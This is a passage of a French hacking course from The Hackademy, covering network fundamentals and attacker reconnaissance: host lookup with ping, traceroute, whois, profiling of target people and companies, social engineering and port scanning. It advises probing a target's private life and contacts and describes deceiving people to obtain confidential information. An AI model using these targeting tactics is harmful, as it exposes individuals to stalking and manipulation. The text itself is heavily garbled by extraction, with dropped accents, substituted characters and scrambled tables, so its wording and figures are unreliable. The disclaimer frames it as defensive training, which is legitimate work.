You are on page 1of 99

Important

Ce polycopi de cours de The Hackademy a pour objectif de contribuer une meilleure comprhension des risques de scurit lis l'usage de l'outil informatique, et ainsi, permettre de s'en protger plus efficacement. l sera utile au! administrateurs syst"me et rseau, au! d#eloppeurs, et tout professionnel tra#aillant a#ec nternet. $i #ous %tes soucieu! de comprendre comment un pirate pourrait tenter de #ous attaquer afin d'%tre m%me de djouer ses tentati#es, ce cours #ous est destin. Cependant aucune garantie n'est donne que ce contenu #a #ous permettre de #ous protger de mani"re totale, mais #ous donnera les lments pour mettre en place une politique de management scurit efficace. &e plus, ce cours ne peut a#oir pour #ocation de cou#rir l'ensemble des sujets lis la scurit de mani"re e!hausti#e ' nous #ous dtaillons les mthodes d'attaque courantes, et #ous fournissons les lments pour #ous en protger. The Hackademy et &() ne sauraient %tre tenus pour responsable des dommages #entuels causs par une application des mthodes prsentes ici sur un syst"me. l est formellement interdit par la loi d'appliquer les techniques d'attaque prsentes dans cette formation sur un syst"me que #ous ne possde* pas. +ous pou#e* cependant les appliquer sur #os syst"mes informatiques des fins de tests de #ulnrabilits, en gardant l'esprit que cela reprsente toujours des risques pour la stabilit des syst"mes audits.

Avertissement
l est essentiel de comprendre que si ces mthodes sont ici prsentes, c'est a#ant tout dans une optique de comprhension gnrale de la scurit et des moyens mis en oeu#re par les pirates, et ce dans le seul et unique but, de pou#oir lutter contre ce danger. &e plus, ces mthodes de protection s'appliquent autant au! entreprises qu'au! particuliers. ,n effet, en dehors du nombre de documents pri#s que #ous possde* sur #otre ordinateur, un #entuel pirate pourrait #ouloir se ser#ir de #otre syst"me comme d'une passerelle dans le but de ne pas %tre retrou#. &ans ce cas, se serait #ous, en tant que personne physique ou morale, de prou#er #otre innocence. &e plus, une politique de scurit con#enable est de rinstaller enti"rement #otre syst"me en cas de piratage, a#ec la perte de temps et de finance que cela implique.

Auteurs
-ous tenons remercier pour leur participation l'laboration de cette formation et l'criture de ce cours '

CrashFr .crashfr/thehackademy.net0 Clad Strife .clad/thehackademy.net0 Xdream Blue .!dream/thehackademy.net0

The Hackademy

DM

123441

S!SD"#AM

S$MMAI"#

The Hackademy

DM

153441

S!SD"#AM

Chapitre % & 6es rseau! 7. -otions rseau 2. Topologie rseau 5. &composition d'896 :. $uite TC)3 ) Chapitre ' & 9echerches d'informations 7. 6a recherche de donnes sur internet 2. 9enseignements sur un syst"me cible Chapitre ( & ;ttaques de ser#ices rseau! 7. 9echerche de failles Chapitre ) & ;ttaque physique 7. 6e < =$ Chapitre * & contr>le distance et espionnage 7. ,spionnage de syst"me 2. )rise de contr>le distance Chapitre + & &etection Trojan 3 ?eylogger 7. )orts ou#erts 2. )rocessus mmoire 5. <ase de registre Chapitre ,& $tganographie, cryptographie 7. )@) 3 @)@ 2. $tganographie Chapitre -& Cracking de mots de passes 7. Au'es ce que le cracking 2. Bichiers passCord 5. $er#ices

The Hackademy

DM

1:3441

S!SD"#AM

Chapitre .& ;nonymat 7. )ro!y enchains 2. pro!y parall"le Chapitre %'& $cripts malicieu! 7. <atch 2. ;cti#eD

The Hackademy

DM

1E3441

S!SD"#AM

CHA IT"# I /es r0seau1

I 2 3otions r0seau
6es rseau! informatiques, dsignent un ensemble de machines interconnectes entre elles, pou#ant communiquer ensemble #ia diffrents supports physique et protocoles de communications. nternet est le plus grand rseau informatique au monde. l permet, toute machine connecte de communiquer a#ec n'importe quelle autre machine du rseau. 6orsque deu! machines communiquent ensemble, on dit qu'elles fonctionnent en mode client 3 ser#eur. 6e ser#eur propose des ser#ices .partage de resources0 et le client les utilise. =n peut comparer cela une entreprise #endant un ser#ice di#ers clients succeptibles de les acheter. )our qu'une communication client 3 ser#eur puisse %tre tablie, le ser#eur et
The Hackademy DM 1F3441 S!SD"#AM

le client doi#ent utiliser les m%me protocoles .mthodes de communication0. ,n effet, si un franGais dsire commander un produit au ,tats1unis sans sa#oir parler anglais, une communication tlphonique ne pourra %tre tablie entre le #endeur .ser#eur0 et le client.

II 2 Topolo4ie r0seau
l e!iste 5 types de topologie physique pour interconnecter les machines d'un reseau.

B5S

C'est la topologie la plus simple et la plus traditionnelle pour un rseau ,thernet .7H<;$,20. 8n cIble coa!ial court d'une machine l'autre. Cette topologie est facile mettre en oeu#re mais le probl"me est que si l'une de ses connection tombe en panne alors c'est tout le rseau qui de#ient indisponible.

#T$I/# 6es rseau! plus comple!es sont batis autour d'une topologie en toile. 6es reseau! en toile disposent d'une boite de jonction appele concentrateur .sCitch ou hub0.Tous les ordinateurs se connectent au concentrateur qui g"re les communications entre ordinateurs .7H<;$,1T0.

The Hackademy

DM

1J3441

S!SD"#AM

A33#A5 &ans une topologie en anneau .Token 9ing0 le cablage et l'organisation matrielle sont semblables ceu! d'un rseau en toile mais au lieu de disposer d'un hub en son centre, il y a un (;8 .(ultistation ;ccess 8nit0. 6e (;8 est fonctionnellement identique un Hub mais est spcialement utilis pour les rseau! Token 9ing et non pour les reseau! ,thernet. 6e (;8 g"re un peu diffremment les communications entre ordinateurs par rapport au Hub.

$ur nternet, les machines sont connectes des rseau!, qui sont di#iss en sous1rseau!. Chaque ordinateur poss"de une adresse unique, l'adresse ). 8ne adresse ) est compose de : octets .e!' 27J.72.5.70. )our a#oir son ) on tapes la commande Cinipcfg .Cin4!3Cinme0 ou ipconfig .Cinnt3Cin2k3Cin!p0. Cet ensemble d'octet defini une adresse unique, a#ec une partie indiquant l'adresse du rseau et l'autre l'adresse de l'hote .machine0. 6es adresses sur nternet son organises en E classes .;,<,C,&,,0.

The Hackademy

DM

1K3441

S!SD"#AM

Classe Classe ; Classe < Classe C Classe & Classe ,

Bormat ) -.H.H.H -.-.H.H -.-.-.H 9eser# pour le (ulticasting .#isio0 9ser# pour Mbuts e!perimentau!M

)lage ) 7.!.!.! 72J.!.!.! 72K.H.!.! 747.2EE.!.! 742.H.H.! 225.2EE.2EE.! 22: 254 2:H 2EE

-b de )ostes (a! 7FJJJ2 FEE5F 2EE Cas particulier, pas de distinction -etCork3Hos t

,!emples F2.H.H.7 jusqu'a F2.2EE.2EE.2EE 724.7H.H.7 11L 724.7H.2EE.2EE 745.2H.2.7 11L 745.2H.2.2EE 2::.:.:.: M8tilisation futurM

;dresses particuli"res ' 72J.H.H.7 localhost ou loopback F2.H.H.H dsigne le rseau de classe ; .tous les bits H H0. F2.2EE.2EE.2EE designe toute les machines d'un rseau de classe ; .tous les bits H 70. ;dresses ) qui de doi#ent jamais %tre routes #ers nternet et utilises pour les rseau! locau! ' 7H.H.H.7 11L 7H.2EE.2EE.2E: 7J2.7F.H.7 11L 7J2.57.2EE.2E: 742.7FK.H.7 11L 742.7FK.2EE.2E: 6es adresses ) permettent de faire des sous1rseau! dans un rseau, par e!emple on peut faire 2EE rseau! de classe C partir d'un rseau de classe <, on appel Ga le M$ubnettingM. ,n effet , d"s que l'on cre un rseau on utilise ce que l'on appele un Mmasque de sous1rseauM qui permet de faire la distinction entre la partie rseau et h>te d'une ) mais aussi pour sa#oir si l'h>te de destination est local ou distante.

III 2 D0composition d6une 5"/


)our #isualiser les pages Ceb lorsque l'on surf, on utilise un client HTT) . nternet e!plorer, -etscape, etc..0 pour se connecter un ser#eur HTT) contenant en gnral des pages HT(6. HTT) .HyperTe!t Transfer )rotocol0'
The Hackademy DM 143441 S!SD"#AM

6e HTT) est un protocole de transfert hyperte!te qui permet la transmission spare et rapide des images et du te!te d'un document. HTT) fait parti des protocoles de la couche application. &"s que les documents sont transmis au client, le ser#eur HTT) interrompe la liaison. @nralement le ser#ice HTT) se trou#e sur le port KH du ser#eur. -ous re#iendrons sur les ports de communications un peu plus loin dans le cours.

896 .8niform 9esource 6ocator0' 6'896 permet au client de sa#oir ou aller chercher un document .elle reprsente l'ensemble de la requ"te en#oye par l'metteur0 par e!emple ' http'33CCC.thehackademy.net'KH3inde!.html 8ne 896 peut %tre decompos de la faGon sui#ante' http CCC dmpfrance.com KH inde!.html )rotocole de communication .http, https, ftp, etc0 -om du ser#eur -om de domaine )ort sur lequel le client se connecte Bichier que l'on dsire rcuprer

Cette 896 permet donc de rcuprer le fichier inde!.html sur trou#ant sur le ser#eur CCC faisant parti du domaine dmpfrance.com en utilisant le ser#ice HTT) prsent sur le port KH. 6e port de conne!ion est tr"s sou#ent homis car chaque ser#ice est attribu un port par dfaut.

I7 2 Suite TC 8I
6e terme TC)3 ) se rapporte surtout deu! protocoles de rseauN TC) et ) qui sont les plus utiliss sur
The Hackademy DM 17H3441 S!SD"#AM

nternet. Ces 2 protocoles font partie d'un ensemble de protocole appels Msuite TC)3 )M .BT), HTT), $(T), ;9) etc...0 cette suite assure le transport des donnes pour tous les ser#ices nternet. 6es 2 types de protocoles qui nous intressent sont les protocoles de ni#eau 9seau et les protocoles de ni#eau Transport. +ous trou#ere* ci1dessous la liste des couches TC)3 ) permettant la comprhension de l'interaction entre les di#ers composants permettant la transmission d'un paquet de donnes entre 2 machines. Chaque protocole est dtaill dans une 9BC .9equest Bor Comment0 disponible sur nternet.

6orsque 2 ordinateurs communiquent entre eu!, ils utilisent le plus sou#ent TC) ou 8&) .couche :0 pour le transport des donnes et ) .couche 50 pour le routage. &onc si l'on utilise TC) ou 8&), on emploie toujours ) comme protocole de couche 5. ;u ni#eau d'un rseau local, a#ant qu'une machine puisse utiliser le protocole ), il faut qu'elle connaisse l'adresse physique de la machine a#ec laquelle elle dsire communiquer. )our cela, elle utilisera le protocole ;9) faisant parti de la m%me couche que le protocole ).

A" Chaque machine poss"de une interface lui permettant de se connecter un rseau. Cette interface matrielle est appell - C .-etCork nterface Card0. 6e plus sou#ent c'est une carte rseau de type ,thernet. Chaque adresse poss"de un numro de srie qui reprsente sont adresse physique. )our afficher les adresses physique de #os interfaces, il #ous suffit de taper O ipconfig 3all P dans une console
The Hackademy DM 1773441 S!SD"#AM

($1&=$. Comme #ous pourre* le constater, une adresse (;C est compose de F octets. 6es 5 premiers permettent d'identifier le constructeur, et les 5 derniers sont normalement uniques pour chaque carte rseau du m%me fabriquant. l est important de not que le protocole ;9) n'est utilis que sur les rseau! locau! et ne peut donc pas transiter nternet. +oici le datagramme du protocole ;9) ' H Type de matriel 6ongueur (;C 6ongueur ) ;dresse (;C source .octets H150 ;dresse (;C source .octets :1E0 ;dresse ) source .octets 2150 ;dresse ) source .octets H170 ;dresse (;C destination .octets H170 Type de protocole =pration 57

;dresse (;C destination .octets 21E0 ;dresse ) destination .octet H150 9BC du protocole ;9) ' http'33CCC.netCorksorcery.com3enp3protocol3arp.htm I ) fait parti de la couche rseau. l assure la li#raison des paquets pour tous les protocoles de la suite TC)3 ). 6es donnes qui franchissent la couche ) sont appelles QQdatagramme )'' ou M)aquet )M. 6'en1t%te ) minimale fait E mots de : octets, soit 2H octets. $'il y a des options la taille ma!imale peut atteindre FH octets. 8n &atagramme ) est constitu de plusieurs parties. 6a premiere partie, l'en1t%te est constitu de plusieurs informations, dont l'adressse ) de l'emeteur, du destinataire mais aussi l'identification du protocole utilis, le TT6, le type de ser#ices et autres comme #ous pou#e* le #oir ci1 dessous' H +ersion 6ongueu r TT6 Type de ser#ice Blags )rotocole ;dresse ) source ;dresse ) destination =ptions &onnes 6a deu!i"me partie du datagramme contient donc les donnes en#oyer. ) peut dcomposer une information en plusieurs paquets de petites tailles .routeurs0. 6a taille ma!imale d'une trame est appele (T8 .(a!imum Transfer 8nit0, elle entrainera la fragmentation du datagramme si celui1ci a une taille plus importante que le (T8 du rseau. )adding 6ongueur totale Bragmentation offset Checksum de l'en1t%te 57

dentification

The Hackademy

DM

1723441

S!SD"#AM

Type de rseau ;rpanet ,thernet B&&

(T8 .en octets0 7HHH 7EHH ::JH

&onc pour atteindre le destinataire un paquet #a passer par des routeurs et emprunter des supports physiques #aris. l n'y a pas de chemin unique pour acheminer les paquets d'un metteur #ers la machine destinataire. 9BC du protocole ) ' http'33CCC.netCorksorcery.com3enp3protocol3ip.htm 5D 6e protocole 8&) .8ser &atagram )rotocol0 est un protocole non orient conne!ion de la couche :. Ce protocole est tr"s simple tant donn qu'il ne fournit pas de contr>le d'erreurs .il n'est pas orient conne!ion comme TC)0. l ne peut pas a#ertir l'emeteur si le packet a t bien reGu par le destinataire ou pas. 8&) en#oit les informations dans un seul paquet. Comme ce protocole est tres minimaliste son en1 tete est tr"s simple' H )ort source 6ongueur &onnes )ort destination Checksum 57

)ort $ource ' )ort correspondant l'application mettrice du datagramme. )ort &estination ' )ort correpondant l'application de la machine mettrice laquelle on s'adresse. 6ongueur ' )rcise la longueur totale du datagramme, en1t%te comprise .en1tete minimale est de Kbits0. Checksum .somme de contr>le0 ' l s'agit d'une somme ralise de telle faGon pou#oir contr>ler l'intgrit du datagramme. 6es ser#eurs &-$ utilisent le protocole 8&) pour communiquer. 9BC du protocole 8&) ' http'33CCC.netCorksorcery.com3enp3protocol3udp.htm

TC TC) .contrairement a 8&)0 est un protocole fiable .orient conne!ion0 car il int"gre des mecanismes qui permettent d'assurer la bonne dli#rance des paquets qu'il achemine entre 2 machines se trou#ant chacune l'autre bout du Ceb .remise en ordre des paquets, retransmission des paquets perdus0. TC) facilite le transfert de fichiers et les sessions distances par l'intermdiaire de transmission de flu!. Ce
The Hackademy DM 1753441 S!SD"#AM

flu! garanti que les donnes arri#eront dans un ordre et un tat identique celui d'emission. 6e syst"me TC) repose sur un circuit #irtuel qui est tabli entre le ser#eur et le client. )our ou#rir ce circuit il faut effectuer le processus d'tablissement de conne!ion en trois temps .three1Cay handshake0. 6e client effectue d'abord une demande de conne!ion aupr"s du ser#eur. Ce dernier lui indique alors qu'il est pr%t et qu'il attend une confirmation. 6e client doit enfin faire sa#oir au ser#eur qu'il maintient toujours sa demande. 6e circuit est ou#ert , la communication peut commencer et les donnes peu#ent circuler dans les 2 directions .full1duple!0.

! et y tant des numro de squence initial . $-, nitial $equence -umber0. 6es numros de squences assurent la fiabilit des communications, ils constituent un compteur de 52bits .: milliard de #aleur possibles0. 6eur premiere fonction est d'assurer que les paquets sont recus dans le bon ordre et qu'aucun d'eu! n'a t perdu en cours de route.

The Hackademy

DM

17:3441

S!SD"#AM

&atagramme TC)' H )ort source -umro de squence -umro d'acquitement Code =ptions &onnes ... )ort destination 57

Taille

9ser# Checksum

Window )ointeur urgent <ourrage

Services et orts Chaque machine poss"de FEE5E ports qu'elle peut utiliser pour communiquer a#ec une autre machine. Ces ports sont utiliss par les ser#eurs pour proposer des ser#ices. Chaque ser#ice se #oit appliqu un port d'coute permettant de dtecter une tentati#e de conne!ion de la part d'un client. +ous pou#e* comparer un port d'une machine une porte d'une maison. 6es ports on 5 etats '

=u#ert .indique que le port est en communication0 ,n coute .indique que le port attend une conne!ion0 Berm .indique que le port est inutilis0

6orsque q'une application dsire proposer un ser#ice sur le rseau, elle met un port en coute. Ces applications sont appls deamons ou ser#eurs .par e!' ftpd est un deamon BT)0. )our afficher l'tat des ports de #otre machine, il #ous suffit de taper O netstat 1an P dans une console ($1&=$ '

Ci1dessous les principau! $er#ices propos sur le Reb et leur port par dfaut '

The Hackademy

DM

17E3441

S!SD"#AM

)rotocole des ser#ices HTT) HTT)$ &-$ BT) .Bile Transfer )rotocol0 $$H Telnet $(T) .$imple (ail Transfer )rotocol0 )=)5 Binger --T) .-etCork -eCs Transfer )rotocol0

;pplication ;pache, $ ;pache, $ <ind, $er#eur &-$ (icrosoft #sftpd, $er#8 $shd telnetd (icrosoft ,!change $er#er, $endmail Betch(ail, BTgate fingerd (,$, nntpd

)ort KH ::5 E5 27 22 25 2E 77H J4 774

CHA IT"# II
The Hackademy DM 17F3441 S!SD"#AM

"echerches d6informations

I 9 /a recherche de donn0es sur Internet


Au'elle soit informaticienne, pirate ou no#ice, une personne doit %tre m%me de mettre sa contribution toutes les ressources qui lui sont porte de main. 6a premi"re *one d'information qu'ai une personne dans ce domaine n'est plus la littrature. C'est nternet. $a#oir mener des recherches efficaces sur nternet est la clef de la russite. )ersonne n'a la science infuse, mais le rassemblement des masses de donnes sur un seul et m%me rseau permet n'importe qui d'a#oir acc"s n'importe quel sa#oir. 6es sources d'informations sur le piratage ne sont pas aussi rares que l'on pourrait le croire. Certes, les sites illgau! diffusant moults McracksM ou tutoriau! illgau! sont difficilement reprables. ,n re#anche les sites lgau! et sur le th"me du piratage sont aussi nombreu! que leurs sujets sont di#ersifis. 6es sites sur la scurit informatique sont de biens meilleures sources d'informations que des pages personnelles sur le piratage. ,n effet ce sont en gnral des personnes qualifies qui adminisitrent ces
The Hackademy DM 17J3441 S!SD"#AM

sites, et non pas des personnes en carence de sa#oir. )ar consquent l'on ne saurait trop #ous recommender ces sites. ls fournissent une documentation gnralement riches en information et offrent de nombreu! points d'acc"s #ers des tutoriau! qui s'adressent aussi bien au! dbutants qu' des personnes qualifies. -ous n'oserions pas #ous assaillir d'adresses 896 dans cette partie du cours, pour au moins deu! raisons. 1 l n'e!iste pas de site rfrentiel la scurit informatique. 1 &es adresses 896 sont disponibles la fin de ce cours. 6es sites sur les #ulnrabilits sont des mines d'or en mati"re de piratage. ls ser#ent .malheureusement S0 aussi bien au! administrateurs rseau! soucieu! d'tablir des stratgies de scurit planifies qu'au! pirates. Ce sont sou#ent de #ritables bases de donnes en mati"res de failles, de bugs, et de probl"mes relatifs la scurit informatique. l serait dommage pour un pirate de chercher s'attaquer un ser#eur sans jamais se rferrer ces sites phares. ;insi n'importe qui peut #aluer la scurit de son syst"me partir des failles connues et recenses par ces sites. ; l'identique des sites sur la scurit informatique, #ous trou#ere* quelques adresses phares en fin de cours. 6es moteurs de recherche sont galement de puissants allis. )ermettant de rechercher des sites en tout genres sur le sujet, ils sont toutefois mettre dans des catgories part. 6es liens #ers les nombreu! sites qu'ils crent ne sont parfois pas de bonnes rfrences. ,n re#anche, a#ec un peu d'habitude, #ous apprendre* rapidement mener des recherches efficaces. 6es mots clefs taper sont par e!emple ' s0curit0 : n .oT n reprsente l'objet sur lequel #ous porte* #os recherches0 ;s0curit0 des n; .oT n reprsente cette fois plusieurs objets tels que Mser#eursM MrouteursM etc.0 +ous pou#e* galement rechercher de la documentation plus gnralise sur des dispositifs de scurit en ne tapant que des mots clefs comme MfireCallsM. 6es rebonds de sites en sites s'effectuent grIce au! sections de liens que mettent en place les Cebmasters. &'un lien sur un site #ous passe* un autre. Cette solution de recherche a un double c>t. &'une part #ous tombere* sou#ent sur des sites rarement #isits, car mal reprsents, et qui sont pourtant d'e!cellentes sources d'informations. &'autre part #ous tombere* sou#ent sur des liens morts ou des sites non mis jour. C'est une chasse au trsor, en moins fastidieu! ' on #oit du paysage U 9emarque ' #ous notere* que l'on n'aborde dans nos sujets de recherche qu'un angle de #ue sur la scurit informatique. ,n effet, si le piratage peut amener mieu! comprendre la scurit, alors le contraire est tout aussi #rifiable. )ou#oir effectuer ce chemin en double1sens est un atout.

II 9 "ensei4nements sur un syst<me ci=le


8ne attaque l'a#eugle sur un syst"me est, 44V du temps, inefficace. l est absolument ncessaire d'entamer une collecte d'informations sur le syst"me #is, dans le but d'largir ses possibilits d'attaques et de s'offrir ainsi plus de fle!ibilit sur le choi! des mthodes d'attaques. 6a stratgie est aussi importante que la manWu#re elle1m%me. (anWu#rer sans but prcis est une perte de temps. &ans les e!plications qui #ont sui#re nous #errons quels sont les diffrents moyens de se renseigner sur sa cible, et comment agir en consquence des informations collectes, en dtaillant les diffrents procds d'attaques traditionnelles que #ous sere* m%me de reproduire en toute simplicit. % 2 /ocaliser 40o4raphi>uement le syst<me ci=le? 6a localisation gographique d'un syst"me donn est asse* utile, mais pas essentiel. Cela #a permettre
The Hackademy DM 17K3441 S!SD"#AM

de dfinir d"s le dpart quelles peu#ent %tre certaines techniques m%me d'%tre utilises lors de l'attaque du syst"me, oT m%me de complter la base d'informations tablir. )our localiser gographiquement un ser#eur le pirate utilisera un traceroute graphique comme nous le #errons un peu plus loin dans le cours. a 2 S6orienter par le nom d6h@te? ;fin d'obtenir le nom d'h>te d'un syst"me, si #ous n'en a#e* que l'adresse ) par e!emple, utilise* la fonction in4 de #otre syst"me, grIce l'outil adquat sous &=$ ' 7. 2. 5. :. ;lle* sous ($1&=$ .Dmarrer, Executer, et tape* McommandM0. Tape* la commande ping. $ur #otre cran dfilent les diffrentes options de paramtrage de l'outil )ing. Tape* ping -a [adresse IP] afin de rsoudre le nom d'h>te d'une adresse ).

E. 6e nom d'h>te, comme sur l'image, peut r#ler de prcieuses informations. $ur l'e!emple on sait que l'abonn habite (ontpellier, ou dans sa bordure, et qu'il est abonn Ranadoo en Brance. 5tilisation de pin4 & )ing est un outil de statistiques fonctionnant sous ($1&=$, dont l'intr%t premier est de #rifier l'e!istence ou non d'un syst"me sur le rseau. l fonctionne par l'en#oi de paquets C()XechoXrequest, au!quels les syst"mes concerns rpondent par des paquets C()XechoXreply. C'est11dire que le syst"me metteur #a faire un en#oi d'un paquet dans le but que la machine cible lui rponde. )ing int"gre di#erses fonctionnalits. ;fin de toutes les #isualiser tape* ping sous &=$.

The Hackademy

DM

1743441

S!SD"#AM

$a#oir lire un compte1rendu de l'outil ping est tr"s simple.

&ans le champ rponse #ous sont indiqus '


en octets la taille du paquet que #ous a#e* en#oy N en millisecondes le temps de rponse du syst"me cibl N et la #aleur du TT6 lorsque le paquet est arri# destination.

Auatres requ%tes C()XechoXrequest sont en#oyes lors d'une utilisation courante de )ing, afin de bien s'assurer des rsultats. = 2 S6orienter par un traAa4e de la route d6acheminement des donn0es? Tracer la route qu'emprunte un paquet de donne pour aller d'un point ; un point < peut1%tre utile afin de dterminer, par e!emple, les diffrentes *ones gographiques qu'il tra#erse, ou encore le dernier routeur emprunt pour l'acheminement des donnes. )our effectuer ce processus, utilise* l'outil Tracert de #otre syst"me. 7. 2. 5. :. ;lle* sous ($1&=$. Tape* tracert. $'affichent alors les options de paramtrage, tout comme pour )ing. =n ne les utilisera pas dans l'absolu, donc tape* simplement tracert [Adresse IP]

The Hackademy

DM

12H3441

S!SD"#AM

E. ci la dtermination de l'itinraire s'est termine sans probl"mes, et l'on sait maintenant par quelles machines sont achemins nos paquets. 5tilisation de Tracert & Tracert est l'abbr#iation de MTrace 9outeM. 6'objectif du logiciel est la mise en lumi"re du chemin emprunt par un paquet de donnes pour atteindre un point prcis d'un rseau. l peut %tre utilis pour l'#aluation des performances d'un rseau, pour #aluer quel ni#eau peu#ent se situe des points de congestion ou localiser des probl"mes d'infrastrucutres. Tracert int"gre di#erses fonctionnalits. ;fin de toutes les #isualiser tape* tracert sous &=$.

$a#oir lire un compte1rendu de l'outil tracert est tr"s simple.

&ans le tableau des rsultats #ous a#e* un classement des syst"mes relais de donnes. 6es dlais en millisecondes indiquent des rsultats sur le temps qu'il a fallu pour contacter chaque syst"me de relai, sachant que cette tentati#e se fait par trois fois. &ans la derni"re colonne se trou#ent les noms d'h>tes des syst"mes de relais, a#ec leurs translations en adresses ).

The Hackademy

DM

1273441

S!SD"#AM

)our localiser gographiquement un routeur, le pirate utilisera un logiciel comme O neotrace P qui maintient jour la liste des principau! routeurs d'internet a#ec leur localisation. +oici le rsultat du traceroute sur CCC.google.fr '

=n pourrait penser que le ser#eur CCC.google.fr se trou#e en Brance mais comme nous le montre neotrace le ser#eur se trou#e au ,tats18nis. ' 2 Bhois & un moyen d6o=tention d6informations sur le propri0taire d6un nom de domaine 6orsqu'un nom de domaine, Mcaramail.comM, par e!emple, est enregistr sur nternet, des informations comme l'identit du MregistrantM, c'est11dire celui qui enregistre le nom de domaine, ou encore l'identit du responsable technique, sont stockes dans les bases de donnes de prestataires de ser#ices appropris. 6es bases de ces prestataires .;9 -, nternic, -etCorks$olutions, @andi, 9 ),...0 sont
The Hackademy DM 1223441 S!SD"#AM

consultables gratuitement par l'intermdiaire de requ%tes appeles MChoisM .comprendre MRho is SM0. &e nombreu! prestataires de ce ser#ice sont en ligne sur nternet, mais leur fiabilit fouiller les bases de donnes peut #arier. ;insi il n'est pas impossible d'a#oir mener des requ%tes MChoisM en passant par plusieurs prestataires. )armi ceu! qui peuplent l'internet on en retiendra au moins trois '

http'33CCC.allChois.com http'33CCC.Chois.net http'33CCC.betterChois.com

5tilisation assist0e d6un service Bhois 6a premi"re tape consiste trou#er un prestataire du ser#ice Rhois. 8tilise* n'importe quel moteur de recherche en entrant pour mot1clef MChoisM. Tr"s #ite les rsultats #ont tomber. Baites des recherches sur l'ensemble du rseau nternet et pas seulement pour des prestataires de #otre pays. 6'utilisation du prestataire est ensuite tr"s simple. Couramment le nom de domaine rechercher sera taper dans une fen%tre de saisie de te!te. $ur le m%me principe que les moteurs de recherche, le prestataire en question se chargera ensuite de mener les recherches au sein des bases de donnes auquels il a acc"s. +oici un e!emple de recherche a#ec ' http'33CCC.allChois.com , que #ous pourre* reproduire che* #ous. $ur la page principale de ;llRhois, entre* dans le module de recherche le domaine sur lequel #ous porte* #os recherches.

6ance* la recherche en cliquant sur M$earchM et les rsultats s'afficheront dans le cadre situ en bas de page.

The Hackademy

DM

1253441

S!SD"#AM

Certains ser#ices permettent d'effectuer des Chois sur les adresses ), cela indiquera au pirate quel socit ou organisation appartient cette ). Comme #ous pou#e* le constater, le Chois fourni entre autre les ser#eurs &-$ associs au domaine, qui pourront dans certains cas r#ler l'adresse ) 3 nom de toutes les machines associs au domaine.

5ne personne & ;fin de rechercher des informations sur une personne, sache* piste* ses traces sur nternet. Consulte* -eCs@roups, forums, pages Ceb pou#ant #ous donner toute information susceptibles de #ous renseigner. 7. $ur les -eCs@roups, utilise* des moteurs de recherche spcifiques au! neCs, comme http'33groups.google.com 2. $ur les pages et les forums, pas d'autre solution, l encore, que de recourir au! moteurs de recherche. 6'utilisation d'un prestataire comme @oogle .http'33CCC.google.com0, semble toute dsigne. 5. @lane* aussi des informations autour de ses proches, en essayant de #ous immiscer dans sa #ie pri#e ou dans ses contacts rguliers. Certes, ce n'est pas tr"s sympathique d'imaginer ce genre de scnarios, surtout pour la #ictime potentielle, mais le fait est qu'a#ec de la patience et du temps, le fruit de #os efforts peut s'a#rer juteu!. :. 8ne mthode, simple, mais mal #ue du monde des pirates reste le M$ocial ,ngineeringM. C'est
The Hackademy DM 12:3441 S!SD"#AM

b%tement une technique qui consiste se faire passer pour qui l'on est pas afin d'obtenir des informations. Aue ce soit par tlphone, par courrier, ou m%me par des rencontres relles, le but du $ocial ,ngineer est de gratter che* sa #ictime, prise de confiance, des informations confidentielles, personnelles... 5ne soci0t0 & ,ssaye* d'obtenir, tout comme pour une personne, des informations au sein de la socit. 6es informations que #ous pourre* rcolter sur une socit ne #ous serront pas forcment prcieuses, quoi que... 7. $achant qu'une socit a tendance a mener des campagnes publicitaires, et un affichage parfois obligatoire sur nternet, runir un grand nombre d'informations comme sur le statut juridique d'une socit, en allant du c>t de che* http'33CCC.societe.com par e!emple, reste simple. 2. 6es informations les plus intressantes que #ous puissie* a#oir concernent les employs au sein m%me de l'entreprise ' noms, prnoms, r>les au sein de l'entreprise, numros de ligne directe... l n'est pas difficile d'a#oir ces informations, et elles peu#ent s'a#rer juteuses. ,n effet, il s'est dj #u des cas oT le nom et prnom de l'administrateur du rseau correspondaient au! logins et mots de pass des acc"s au! routeurs 1 le nom et le prnom ayant t obtenus par un Rhois sur le site de l'entreprise concerne, au ni#eau des indications sur l'identit du responsable technique. ;pr"s a#oir rcupr un certain nombre de renseignements sur le syst"me cible, il est temps de passer des oprations plus techniques, qui doi#ent %tre effectues sur le syst"me, afin de pou#oir procder par la suite l'laboration d'une stratgie d'attaque. B 2 #valuation des caract0risti>ues du syst<me & l faut a#ant tout prciser ce qu'on entend par Msyst"meM. ;u ni#eau de ce cours ne seront e!pliqus que les procds ncessaires la ralisation d'attaques sur un syst"me, et un seul. C'est dire que l'on #a #oir quelles stratgies et mthodes adoptent les pirates lorsqu'ils souhaitent s'attaquer un syst"me prcis, et non pas l'ensemble d'un rseau .comme le rseau nternet d'une entreprise0, soit une pluralit de syst"mes ' les stratgies et procds ne sont pas les m%mes, et ce n'est pas la direction que doit prendre le cours. )ass ce petit claircissement, abordons le premier et plus essentiel processus ' le Mscan de portsM. % 2 ;Scan de ports; ou ;la recherche d6applications serveurs actives; & 9appele*1#ous le dbut de ce cours. 8ne application ser#eur, c'est une application dli#rant un ser#ice prcis sur la requ%te d'un client, dans le cadre d'une configuration adapte. &onc un ser#eur est constamment en attente de connections, et pour ce faire il monopolise un port prcis, entre 7 et FEE5E, qui lui ou#re un canal de communication. C'est un peu schmatique par rapport au! comple!es donnes techniques qui rgissent le processus, mais l'essentiel est l. $canner les ports #a donc permettre un pirate de reprer les applications ser#eurs acti#es. Chaque port ou#ert peut ainsi %tre considr comme un point d'entre au syst"me, une #entuelle source de #ulnrabilits.
The Hackademy DM 12E3441 S!SD"#AM

,ffectuer un scan de ports est tr"s simple. (oults logiciels, tous lgau!, hantent l'internet cet effet. &ans nos pratiques nous utiliserons -autilus -et9anger, qui est tr"s efficace et tr"s rapide. +ous le trou#ere* sur http'33CCC.doCnload.com, ou encore sur le site des d#eloppeurs .http'33CCC.nautidigital.com0. 7. 2. 5. :. =u#re* le logiciel. Clique* sur l'onglet )ort$canner. &ans la *one MHostname3;ddressM indique* une adresse ) ou un nom d'h>te. &ans la *one M)ort rangeM indique* une plage de port ou un port spcifique #rifier. 8ne plage de ports c'est un ensemble de ports compris dans une inter#alle. &ans le cas de -autilus, spcifier une inter#alle de port de type Y5HHH N FHHHZ se fait selon la synta!e sui#ante ' M5HHH1FHHHM. +ous pou#e* aussi n'indiquer qu'un seul numro, cel re#iendrait ne #rifier qu'un seul port. -ote* toutefois quelques petites choses. 8n bon scan se fait sur une inter#alle de 7 FEE5E, c'est11dire sur l'intgralit des ports. ,n effet, il se peut que des applications ser#eurs se terrent dans des ports loigns. C'est aussi pourquoi nous #ous dconseillons l'utilisation de 